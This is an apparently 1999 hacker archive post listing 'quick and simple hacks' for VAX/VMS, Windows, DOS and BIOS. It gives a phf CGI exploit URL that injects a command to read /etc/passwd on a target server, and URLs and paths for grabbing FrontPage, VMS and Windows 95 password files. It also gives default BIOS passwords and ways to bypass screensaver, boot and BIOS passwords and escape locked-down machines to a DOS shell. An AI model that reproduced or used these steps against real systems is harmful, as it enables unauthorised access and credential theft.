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Posted Aug 17, 1999
Authored by ManiC

A nice explanation of some common "quick and simple hacks".

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These are all quick and simple hacks email me if you've got anymore i'll
write a few programs that will call on DOS etc soon.
The topics covered are vax/vms/windows/dos/macros/bios/etc in no particular
order... This is all pretty common knowledge and it can come in useful
sometimes .
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[ from http://www.infowar.co.uk/manicx/ ]
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System: Webserver Using phf

Effect: Run commands that user "nobody" can use ie (cat /etc/passwd)

Command: http://www.yourtarget.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

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System: Webserver using Microsoft Front Page Extensions

Password file: Type the following in your location bar in your browser

Command: www.yourtarget.com/_vti_pvt/service.pwd

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System: Windows (With VB)

Shell out: Put this in a vb application

Command: Private Sub cmdCommand_Click()
retval = Shell("start /max command.com")
End Sub

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System: Windows

Shell out: This means get into dos !! use netscape or explorer to
browse your hardrive (i.e. can run games at school)

Command: file:///c|/windows/command.com in to the location URL
Or
Command: c:\ first then browse until you get your game.

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System: Vax Or Vms

Function: Will Dump Some files in your Account Has an effect on your
reading status too

Command: $analyze/process_dump

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System: Vax Or Vms

Function: Where is that startup File

Try Here: SYS$MANAGER:ANNOUNCE.TXT or SYS$Announce.txt

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System: VMS

Function: Get password in

Command: sys$system:sysuaf.dat

Look at the alt.2600 FAQ for a program called Guess_password

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System: Windows 95

Function: ISP account name and encrypted password

Password: c:\windows\user.da0

Search : Account to get ISP name and Password (encrypted)

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System: Windows 95

Function: Get rid of password on screen saver

Command: just turn off password protection before screen saver comes on
Or
press ctrl+alt+del if its a non standard screensaver
Or
edit c:\windows\control.ini change PWprotected=1 to 0
and delete after the Password=
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System: Windows

Function: Gets rid of BIOS password (and resets CMOS settings)

Command: download this file unzip and run
<a href="killcmos.zip">killcmos.zip</a>

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System: BIOS

Function: Remove BIOS password

Command: Pull out the CMOS battery for 5-10 minutes
Then go through setup again once you have installed the battery
Best idea is to put in a new password :) then they will think
that they just forgot it ]:'

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System: BIOS

Function: BIOS Password Defaults

Command: Defaults are RM, BIOS, password, Tiny, compaq, Award
admin, system

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System: Windows

Function: Get past any password protection before boot-up

Command: Try booting from a floppy
or holding down the shift key during startup
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System: Windows

Function: Shell out (get into DOS)

Command: open wordpad or winword etc
Open command.com in the word editor
save it as something you can use i.e. calc.exe
close word or whatever down
run calc to get into dos.
Or..
Write a small program in tpw or c or whatever
that puts you in DOS.
Had one written in Turbo Pascal i'll try and get as many
as i can in the near future and stick em up here..
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System: Windows

Function: Shell out (get into DOS)

Command: Open word 97 if you've got it
Goto insert then object
Click on create from file
in file type c:\command.com or c:\windows\command.com
click OK
Right click on the inserted file and goto package object then
activate contents
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System: Windows

Function: Shell out (get into DOS)

Command: Save this file
<a href="letmeout.txt">Letmeout</a>
on your desktop type in c:\windows\desktop\letmeout.bat
then just click on it.

In the .bat file it has one line (see below)
call command.com
so you can make up your own .bat files
simply run wordpad list down your commands
and save as whatever.bat

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